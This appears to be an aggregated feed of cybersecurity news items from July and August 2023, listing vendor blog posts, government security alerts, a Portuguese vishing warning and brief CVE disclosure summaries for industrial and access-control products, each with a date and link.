In the ever-evolving world of cybersecurity, enterprises are constantly seeking the most effective solutions to secure their networks and data. GigaOm’s Radar Report for Secure Service Access, GigaOm’s term for SASE, provides a comprehensive look at the industry, and for the second consecutive year, names Cato Networks a “Leader” and “Outperformer.” The recognition points to... The post Cato SASE Cloud: A Two-Time Leader and Outperformer in GigaOm’s Radar Report for Secure Service Access appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-sase-cloud-a-two-time-leader-and-outperformer-in-gigaoms-radar-report-for-secure-service-access/
Private Mobile Connectivity: More Visibility, Security, and Control
2023-08-11T13:00:00Z | 1691758800

https://www.akamai.com/blog/edge/private-mobile-connectivity-more-visibility-security-control
Alerta CERT.PT: Campanha de Vishing — “Selecione Tecla 1”
2023-08-11T00:00:00Z | 1691712000

O CERT.PT tem vindo a registar diversas campanhas de Vishing (chamadas telefónicas fraudulentas) com destino a cidadãos. Nestas chamadas os cidadãos são informados, através da reprodução de uma gravação, geralmente em língua inglesa, que o seu número de telemóvel está envolvido em alegadas práticas ilícitas. Depois desta gravação é pedido ao cidadão que selecione a tecla 1 do seu telefone para que prossiga para uma conversa com um operador, visando a resolver a situação. Nesta fase, a conversa passa para um indivíduo que solicita informações pessoais, tais como nome completo, cidade e país de residência. De seguida a chamada é terminada.Se receber um contacto telefónico com estas características pode estar a ser alvo de uma campanha de Vishing com o objetivo de capturar as suas informações pessoais. Ao ser contactado, confirme sempre a veracidade do número de telefone de origem, não partilhe os seus dados pessoais, nem siga qualquer instrução recebida. Para mais informações consulte o documento: https://www.cncs.gov.pt/pt/boas-praticas-contra-o-phishing-o-smishing-e-o-vishing/. Denuncie junto dos responsáveis de segurança informática da organização ou junto das autoridades competentes sempre que se é alvo de um ataque deste tipo. Notifique o CERT.PT (cert@cert.pt) ou através do formulário online (https://www.cncs.gov.pt/pt/notificacao-incidentes/), caso receba chamadas telefónicas deste género para que possamos registar a evolução da campanha e indicar as medidas de mitigação a adotar.Salientamos ainda que a Polícia Judiciária publicou um alerta sobre uma campanha de Vishing similar, disponível em: https://www.policiajudiciaria.pt/burlaatravesvishing/.    

https://dyn.cncs.gov.pt/pt/detalhe/art/135790/alerta-certpt-campanha-de-vishing-selecione-tecla-1
Corsa Security Works with Seamless Infotech to Offer a New Managed Virtual Firewall Service for its Customers
2023-08-10T13:00:00Z | 1691672400

Automated firewall virtualization allows for rapid deployment of virtual firewalls to bring customers in service quickly and easily Corsa Security, leaders in scaling network security, today announced it has entered into an agreement with Seamless Infotech, a managed security service provider, to easily and quickly offer their customers a virtual firewall service (VFS). Seamless Infotech can now create […] The post Corsa Security Works with Seamless Infotech to Offer a New Managed Virtual Firewall Service for its Customers appeared first on Corsa Security.

https://www.corsa.com/2023/08/10/corsa-security-works-with-seamless-infotech-to-offer-a-new-managed-virtual-firewall-service-for-its-customers/
The Transition from SD-WAN to SASE: How to Avoid Disaster
2023-08-10T10:13:08Z | 1691662388

The post The Transition from SD-WAN to SASE: How to Avoid Disaster appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-from-sd-wan-to-sase-how-to-avoid-disaster
Give Me an E, Give Me a T, Give Me a W. What Do You Get? RPC!
2023-08-10T08:30:00Z | 1691656200

https://www.akamai.com/blog/security-research/msrpc-defense-measures-in-windows-etw
Don’t Renew Your SD-WAN Contract Before Reading This Article
2023-08-10T07:48:35Z | 1691653715

If your enterprise SD-WAN contract is due for renewal but your existing SD-WAN solution doesn’t align with your functional or business objectives, you have other options. In this blog post, we review four potential paths to replace or enhance your SD-WAN infrastructure. Then, we list which considerations you should take when deciding on your next... The post Don’t Renew Your SD-WAN Contract Before Reading This Article appeared first on Cato Networks.

https://www.catonetworks.com/blog/dont-renew-your-sd-wan-contract-before-reading-this-article/
High Threat Security Alert (A23-08-07): Multiple Vulnerabilities in Microsoft Products (August 2023)
2023-08-10T04:00:00Z | 1691640000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-08): Multiple Vulnerabilities in Adobe Reader/Acrobat
2023-08-10T04:00:00Z | 1691640000

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-09): Vulnerability in Fortinet FortiOS
2023-08-10T04:00:00Z | 1691640000

Fortinet released a security advisory to address a vulnerability in Fortinet FortiOS.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA D3D10 Driver Shader Functionality dcl_input index memory corruption vulnerability
2023-08-10T00:00:00Z | 1691625600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1720
NVIDIA D3D10 Driver Shader Functionality undeclared dcl_output memory corruption vulnerability
2023-08-10T00:00:00Z | 1691625600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1719
NVIDIA D3D10 Driver Shader Functionality dcl_resource_structured index memory corruption vulnerability
2023-08-10T00:00:00Z | 1691625600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1721
Smashing the state machine: the true potential of web race conditions
2023-08-09T18:00:00Z | 1691604000

For too long, web race condition attacks have focused on a tiny handful of scenarios. Their true potential has been masked thanks to tricky workflows, missing tooling, and simple network jitter hiding

https://portswigger.net/research/smashing-the-state-machine
Xurum: New Magento Campaign Discovered
2023-08-09T14:00:00Z | 1691589600

https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell
Use our suite of eBPF libraries
2023-08-09T10:45:15Z | 1691577915

Trail of Bits has developed a suite of open-source libraries designed to streamline the creation and deployment of eBPF applications. These libraries facilitate efficient process and network event monitoring, function tracing, kernel debug symbol parsing, and eBPF code generation. Previously, deploying portable, dependency-free eBPF applications posed significant challenges due to Linux kernel […]

https://blog.trailofbits.com/2023/08/09/use-our-suite-of-ebpf-libraries/
CVE-2023-39478
2023-08-09T08:56:00Z | 1691571360

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing Secure Integration Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of OPC FileDirectory namespaces. The issue results from the lack of proper validation of user-supplied data before using it to create a server object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39478
CVE-2023-39479
2023-08-09T08:55:00Z | 1691571300

This vulnerability allows remote attackers to create directories on affected installations of Softing Secure Integration Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of FileDirectory OPC UA Objects. The issue results from allowing unauthorized access to the filesystem. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39479
CVE-2023-39480
2023-08-09T08:54:00Z | 1691571240

This vulnerability allows remote attackers to create arbitrary files on affected installations of Softing Secure Integration Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of FileDirectory OPC UA Objects. The issue results from allowing unauthorized access to the filesystem. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39480
CVE-2023-39481
2023-08-09T08:53:00Z | 1691571180

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing Secure Integration Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the web server. The issue results from an inconsistency in URI parsing between NGINX and application code. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39481
CVE-2023-39482
2023-08-09T08:52:00Z | 1691571120

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Softing Secure Integration Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within libopcuaclient.so. The issue results from hardcoding crytographic keys within the product. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39482
CVE-2023-38125
2023-08-09T08:51:00Z | 1691571060

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the configuration of the web server. The issue results from the lack of appropriate Content Security Policy headers. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38125
CVE-2023-38126
2023-08-09T08:50:00Z | 1691571000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38126
CVE-2023-27335
2023-08-09T08:48:00Z | 1691570880

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the input parameters provided to the edgeAggregetor client. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-27335
Akamai?s Perspective on August?s Patch Tuesday 2023
2023-08-09T05:00:00Z | 1691557200

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-august-2023
The National Cyber Security Centre Finland’s weekly review – 31/2023
2023-08-08T09:36:49Z | 1691487409

In recent weeks, there have been scam messages going around impersonating the Suomi.fi service and Osuuspankki, among other parties. We also urge our readers to watch out for phishing email messages disguised as secure emails.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-312023
The National Cyber Security Centre Finland’s weekly review – 31/2023
2023-08-08T09:36:49Z | 1691487409

In recent weeks, there have been scam messages going around impersonating the Suomi.fi service and Osuuspankki, among other parties. We also urge our readers to watch out for phishing email messages disguised as secure emails.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-312023
CVE-2023-39477
2023-08-08T08:47:00Z | 1691484420

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Inductive Automation Ignition. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of OPC UA ConditionRefresh requests. By sending a large number of requests, an attacker can consume all available resources on the server. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39477
Security Alert (A23-08-05): Multiple Vulnerabilities in Android
2023-08-08T04:00:00Z | 1691467200

Google has released Android Security Bulletin August 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-06): Multiple Vulnerabilities in Microsoft Edge
2023-08-08T04:00:00Z | 1691467200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Ransomware on the Move: Evolving Exploitation Techniques and the Active Pursuit of Zero-Days
2023-08-07T13:00:00Z | 1691413200

https://www.akamai.com/blog/security-research/ransomware-on-the-move-evolving-exploitation-techniques
SophosAI at DEF CON: Orchestrating large-scale scams using text, audio and image generative AI
2023-08-07T11:00:45Z | 1691406045

AI Village talk highlights how generative  can be used to automate the creation of fraud campaigns, generating hundreds of fraudulent sites.

https://news.sophos.com/en-us/2023/08/07/sophosai-at-def-con-orchestrating-large-scale-scams-using-text-audio-and-image-generative-ai/
Gartner: Where Do I Start With SASE Evaluations: SD-WAN, SSE, Single-Vendor SASE, or Managed SASE?
2023-08-07T06:50:56Z | 1691391056

If you’re starting your SASE evaluation journey, Gartner is here to assist. In a new helpful guide, they delineate how organizations can build their SASE strategy and shortlist vendors. In this blog post, we bring a short recap of their analysis. You can read the entire document here. Quick Reminder: What is SASE? Gartner defined... The post Gartner: Where Do I Start With SASE Evaluations: SD-WAN, SSE, Single-Vendor SASE, or Managed SASE? appeared first on Cato Networks.

https://www.catonetworks.com/blog/gartner-where-do-i-start-with-sase-evaluations-sd-wan-sse-single-vendor-sase-or-managed-sase/
Security Alert (A23-08-04): Multiple Vulnerabilities in VMware Horizon Server
2023-08-07T04:00:00Z | 1691380800

VMware has published a security advisory to address multiple vulnerabilities in VMware Horizon Server.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato SASE vs. The SASE Alternatives
2023-08-06T14:11:30Z | 1691331090

The post Cato SASE vs. The SASE Alternatives appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sase-vs-the-sase-alternatives/
A Distributed Cloud Platform Is a Priority for Gaming IT Leaders
2023-08-04T13:00:00Z | 1691154000

https://www.akamai.com/blog/cloud/distributed-cloud-platform-priority-for-gaming-it-leaders
CVE-2023-39468
2023-08-04T08:46:00Z | 1691138760

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of DbasSectorFileToExecuteOnReset parameter. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39468
CVE-2023-39467
2023-08-04T08:45:00Z | 1691138700

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of certificate web directory. The issue results from the exposure of sensitive information in the application webroot. An attacker can leverage this vulnerability to disclose sensitive information.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39467
CVE-2023-39466
2023-08-04T08:44:00Z | 1691138640

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists within the get_config endpoint. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose sensitive information.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39466
CVE-2023-39465
2023-08-04T08:43:00Z | 1691138580

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists within the TmwCrypto class. The issue results from the usage of a hard-coded cryptograhic key and the usage of a hard-coded certificate. An attacker can leverage this vulnerability to disclose sensitive information.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39465
CVE-2023-39461
2023-08-04T08:41:00Z | 1691138460

This vulnerability allows remote attackers to write arbitrary files on affected installations of Triangle MicroWorks SCADA Data Gateway. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of event logs. The issue results from improper sanitization of log output. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39461
CVE-2023-39460
2023-08-04T08:40:00Z | 1691138400

This vulnerability allows remote attackers to create arbitrary files on affected installations of Triangle MicroWorks SCADA Data Gateway. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the creation of event logs. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39460
CVE-2023-39462
2023-08-04T08:39:00Z | 1691138340

This vulnerability allows remote attackers to upload arbitrary files on affected installations of Triangle MicroWorks SCADA Data Gateway. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of workspace files. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39462
CVE-2023-39457
2023-08-04T08:37:00Z | 1691138220

This vulnerability allows remote attackers to bypass authentication on affected installations of Triangle MicroWorks SCADA Data Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists due to the lack of user authentication. The issue results from missing authentication in the default system configuration. An attacker can leverage this vulnerability to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39457
Unmasking the Attacker and Decoding Threat Actor Patterns
2023-08-03T17:52:28Z | 1691085148

Contextual visibility into the patterns and activities of threat actors streamlines investigations and helps your organization build proactive defenses against cyber and physical attacks. The post Unmasking the Attacker and Decoding Threat Actor Patterns appeared first on Flashpoint.

https://flashpoint.io/blog/threat-actor-profiles/
A CEO?s Perspective: Data Transfer Is the Silent Killer
2023-08-03T13:00:00Z | 1691067600

https://www.akamai.com/blog/cloud/data-transfer-is-the-silent-killer
The National Cyber Security Centre Finland’s weekly review – 30/2023
2023-08-03T07:45:58Z | 1691048758

This week we talk about the National Cyber Security Centre Finland’s assessment of current software vulnerabilities and the epidemic of social media account hijacking.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-302023
The National Cyber Security Centre Finland’s weekly review – 30/2023
2023-08-03T07:45:58Z | 1691048758

This week we talk about the National Cyber Security Centre Finland’s assessment of current software vulnerabilities and the epidemic of social media account hijacking.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-302023
Security Alert (A23-08-02): Multiple Vulnerabilities in Google Chrome
2023-08-03T04:00:00Z | 1691035200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-03): Multiple Vulnerabilities in Cisco Products
2023-08-03T04:00:00Z | 1691035200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Leaked Secrets and Unlimited Miles: Hacking the Largest Airline and Hotel Rewards Platform
2023-08-03T00:00:00Z | 1691020800

Between March 2023 and May 2023, we identified multiple security vulnerabilities within points.com, the backend provider for a significant portion of airline and hotel rewards programs. These vulnerabilities would have enabled an attacker to access sensitive customer account information, including names, billing addresses, redacted credit card details, emails, phone numbers, and transaction records.

https://samcurry.net/points-com
Protect Every API Anywhere with API Security
2023-08-02T13:00:00Z | 1690981200

https://www.akamai.com/blog/security/protect-every-api-anywhere-with-api-security
A mistake in the bulletproofs paper could have led to the theft of millions of dollars
2023-08-02T11:00:30Z | 1690974030

We discovered a critical vulnerability in Incognito Chain that would allow an attacker to mint arbitrary tokens and drain user funds. Incognito offers confidential transactions through zero-knowledge proofs, so an attacker could have stolen millions of dollars of shielded funds without ever being detected or identified. The vulnerability stemmed from an insecure […]

https://blog.trailofbits.com/2023/08/02/a-mistake-in-the-bulletproofs-paper-could-have-led-to-the-theft-of-millions-of-dollars/
Nüüdsest saavad ettevõtjad riiklikke teavitusi lugeda ka riigiportaalist
2023-08-02T08:00:33Z | 1690963233

Ettevõtetel on võimalik riikliku postkasti kaudu saada ülevaade neile edastatud ametlikest teavitustest ka riigiportaalist eesti.ee.

https://ria.ee/uudised/nuudsest-saavad-ettevotjad-riiklikke-teavitusi-lugeda-ka-riigiportaalist
Security Alert (A23-08-01): Multiple Vulnerabilities in Firefox
2023-08-02T04:00:00Z | 1690948800

Mozilla has published the advisories (MFSA2023-29, MFSA2023-30 and MFSA2023-31) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-38958
2023-08-01T12:59:00Z | 1690894740

An access control issue in ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to arbitrarily close and open the doors managed by the platform remotely via sending a crafted web request.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38958
CVE-2023-38956
2023-08-01T12:58:00Z | 1690894680

A path traversal vulnerability in ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38956
CVE-2023-38955
2023-08-01T12:57:00Z | 1690894620

ZKTeco BioAccess IVS v3.3.1 allows unauthenticated attackers to obtain sensitive information about all managed devices, including their IP addresses and device names.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38955
CVE-2023-38954
2023-08-01T12:57:00Z | 1690894620

ZKTeco BioAccess IVS v3.3.1 was discovered to contain a SQL injection vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38954
CVE-2023-38952
2023-08-01T12:56:00Z | 1690894560

Insecure access control in ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read sensitive backup files and access sensitive information such as user credentials via sending a crafted HTTP request to the static files resources of the system.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38952
CVE-2023-38951
2023-08-01T12:55:00Z | 1690894500

A path traversal vulnerability in ZKTeco BioTime v8.5.5 allows attackers to write arbitrary files via using a malicious SFTP configuration.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38951
CVE-2023-38950
2023-08-01T12:54:00Z | 1690894440

A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38950
CVE-2023-38949
2023-08-01T12:52:00Z | 1690894320

An issue in a hidden API in ZKTeco BioTime v8.5.5 allows unauthenticated attackers to arbitrarily reset the Administrator password via a crafted web request.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38949
CERT Polska will contribute to the CVE vulnerability database
2023-08-01T11:00:00Z | 1690887600

From the beginning of August, CERT Polska, as the only institution in Poland and one of 7 CERTs in Europe, can assign CVE numbers, which are used to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.

https://cert.pl/en/posts/2023/08/cna/
Key Findings From “WAN Transformation with SD-WAN: Establishing a Mature Foundation for SASE Success”
2023-08-01T06:24:09Z | 1690871049

SD-WAN has enabled new technology opportunities for businesses. But not all organizations have adopted SD-WAN in the same manner or are having the same SD-WAN experience. As the market gravitates away from SD-WAN towards SASE, research and consulting firm EMA analyzed how businesses are managing this transition to SASE. In this blog post, we present... The post Key Findings From “WAN Transformation with SD-WAN: Establishing a Mature Foundation for SASE Success” appeared first on Cato Networks.

https://www.catonetworks.com/blog/key-findings-from-wan-transformation-with-sd-wan/
The Flashpoint Firehose: 5 Questions With Michael Raypold, VP of Engineering
2023-07-31T13:55:15Z | 1690811715

We sit down for a Q&A with Michael Raypold to discuss the launch of the Flashpoint Firehose, our new data-as-a-service solution The post The Flashpoint Firehose: 5 Questions With Michael Raypold, VP of Engineering appeared first on Flashpoint.

https://flashpoint.io/blog/firehose-michael-raypold/
How AI will affect cybersecurity: What we told the CFTC
2023-07-31T11:00:32Z | 1690801232

Dan Guido, CEO The second meeting of the Commodity Futures Trading Commission’s Technology Advisory Committee (TAC) on July 18 focused on the effects of AI on the financial sector. During the meeting, I explained that AI has the potential to fundamentally change the balance between cyber offense and defense, and that we need security-focused benchmarks […]

https://blog.trailofbits.com/2023/07/31/how-ai-will-affect-cybersecurity-what-we-told-the-cftc/
Security Requires Speed
2023-07-31T07:19:06Z | 1690787946

For as long as anyone can remember, organizations have had to balance 4 key areas when it comes to technology: security efficacy, cost, complexity, and user experience. The emergence of SASE and SSE brings new hope to be able to deliver fully in each of these areas, eliminating compromise; but not all architectures are truly... The post Security Requires Speed appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-requires-speed/
High Threat Security Alert (A23-07-23): Vulnerability in Ivanti Endpoint Manager Mobile (MobileIron Core)
2023-07-31T04:00:00Z | 1690776000

Ivanti has published a security advisory to address a vulnerability in Ivanti Endpoint Manager Mobile.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-24): Vulnerability in QNAP Products
2023-07-31T04:00:00Z | 1690776000

QNAP has published a security advisory to address a vulnerability in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
The Power of Proximity: Local DDoS Scrubbing Centers Enhance Security
2023-07-28T13:00:00Z | 1690549200

https://www.akamai.com/blog/security/the-power-of-proximity-local-ddos-scrubbing-centers-enhance-security
The future of Clang-based tooling
2023-07-28T11:00:19Z | 1690542019

Clang is a marvelous compiler; it’s a compiler’s compiler! But it isn’t a toolsmith’s compiler. As a toolsmith, my ideal compiler would be an open book, allowing me to get to everywhere from anywhere. The data on which my ideal compiler would operate (files, macros, tokens), their eventual interpretation (declarations, statements, types), […]

https://blog.trailofbits.com/2023/07/28/the-future-of-clang-based-tooling/
The Never-Ending Phishing Scam: When ?Natalie Hamilton? Reemerged with a Vengeance (and Power Drill)
2023-07-27T14:00:00Z | 1690466400

https://www.akamai.com/blog/security-research/never-ending-sophisticated-phishing-scam-campaign
CVE-2023-3825
2023-07-27T11:52:00Z | 1690458720

CWE-400: Uncontrolled Resource Consumption PTC’s KEPServerEX Versions 6.0 to 6.14.263 are vulnerable to being made to read a recursively defined object that leads to uncontrolled resource consumption. KEPServerEX uses OPC UA, a protocol which defines various object types that can be nested to create complex arrays. It does not implement a check to see if such an object is recursively defined, so an attack could send a maliciously created message that the decoder would try to decode until the stack overflowed and the device crashed. PTC wishes to inform users that the attack vector leveraged during the research involved an un-authenticated OPC UA Client. Standard controls available in the product and outlined in the Secure Deployment guide are sufficient to mitigate this vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2023-3825
The Increased Use of Mobile Devices Expands the Threat Landscape
2023-07-26T13:00:00Z | 1690376400

https://www.akamai.com/blog/security/increased-use-mobile-devices-expands-threat-landscape
Announcing the Trail of Bits Testing Handbook
2023-07-26T11:00:28Z | 1690369228

Trail of Bits is thrilled to announce the Testing Handbook, the shortest path for developers and security professionals to derive maximum value from the static and dynamic analysis tools we use at Trail of Bits. Why did we create the Testing Handbook? At Trail of Bits, we have spent countless hours studying, […]

https://blog.trailofbits.com/2023/07/26/announcing-the-trail-of-bits-testing-handbook/
The TAG Heuer Porsche Formula E Team & Cato Networks: The Story Behind the Partnership
2023-07-26T08:20:14Z | 1690359614

In November 2022, the TAG Heuer Porsche Formula E Team announced its partnership with Cato Networks, declaring Cato the team’s official SASE partner. Cato Networks provides the TAG Heuer Porsche Formula E Team with the connectivity and security they need to deliver superior on-track performance during the races.  According to Thomas Eue, Lead IT Product... The post The TAG Heuer Porsche Formula E Team & Cato Networks: The Story Behind the Partnership  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-partnership-story-of-cato-networks-and-the-tag-heuer-porsche-formula-e-team/
The National Cyber Security Centre Finland’s weekly review – 29/2023
2023-07-26T06:46:52Z | 1690354012

This week we talk about malware spread through USB memories and June’s Cyber Weather report and share tips for the secure use of mobile phones and ensuring information security during the holiday season.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-292023
The National Cyber Security Centre Finland’s weekly review – 29/2023
2023-07-26T06:46:52Z | 1690354012

This week we talk about malware spread through USB memories and June’s Cyber Weather report and share tips for the secure use of mobile phones and ensuring information security during the holiday season.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-292023
High Threat Security Alert (A23-07-22): Vulnerability in Ivanti Endpoint Manager Mobile (MobileIron Core)
2023-07-26T04:00:00Z | 1690344000

Ivanti has published a security advisory to address a vulnerability in Ivanti Endpoint Manager Mobile.

https://www.govcert.gov.hk/en/alerts_detail.php
IntelMQ 3.2.0 released: Run bots as a library
2023-07-25T14:34:22Z | 1690295662

We are continuing to support IntelMQ, an open-source solution for collecting and processing security feeds. Recently, the IntelMQ Community announced the release of new version 3.2.0. In the new release, IntelMQ received support for running bots as a library, which should allow for better integration with other tools. A significant contribution from our side is rewriting the IntelMQ API to use a modern FastAPI framework. As usual, this update contains plenty of bug fixes and enhancements. We have improved the performance of some CLI commands, which was previously reported as a significant issue for larger workflows. The complete changelog and release note are available on GitHub. IntelMQ 3.2.0 has already been released on GitHub, PyPI, and as deb packages and Docker images in the Docker Hub. Some packages are delayed (including the API for Ubuntu 22.04) because of packaging issues, and they will follow soon. We are thrilled to hear your feedback – the best place to share your thoughts with the IntelMQ Community is GitHub issues and the IntelMQ users mailing list. This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2023/7/intelmq-320-released-run-bots-as-a-library
Why It?s Important to Make Tech More Accessible
2023-07-25T13:00:00Z | 1690290000

https://www.akamai.com/blog/culture/why-its-important-to-make-tech-more-accessible
How to Be a Bold and Effective Security Leader
2023-07-25T11:08:00Z | 1690283280

Security leaders today are facing a number of challenges, including a rise in the number of breaches, a need to accommodate remote work and networking requirements to replace MPLS networks. In this new blog post, we share insights about this new reality by David Holmes, Senior Analyst at Forrester, as well as an in-depth explanation... The post How to Be a Bold and Effective Security Leader appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-be-a-bold-and-effective-security-leader/
High Threat Security Alert (A23-07-19): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-07-25T04:00:00Z | 1690257600

Apple has released iOS 15.7.8, iOS 16.6, iPadOS 15.7.8 and iPadOS 16.6 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-07-20): Multiple Vulnerabilities in Apple Products
2023-07-25T04:00:00Z | 1690257600

Apple has released security updates to fix the vulnerabilities in macOS and Safari.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-21): Vulnerability in OpenSSH
2023-07-25T04:00:00Z | 1690257600

OpenSSH has released 9.3p2 to fix a vulnerability in various versions of OpenSSH.

https://www.govcert.gov.hk/en/alerts_detail.php
Identifying a DNS Exfiltration Attack That Wasn?t Real ? This Time
2023-07-24T13:00:00Z | 1690203600

A recent red team DNS exfiltration alert confirms that Akamai Secure Internet Access is an effective security tool for this type of detection and analysis.

https://www.akamai.com/blog/security/identifying-dns-exfiltration-attack-that-wasnt-real-this-time
SASE is not SD-WAN + SSE
2023-07-24T07:27:30Z | 1690183650

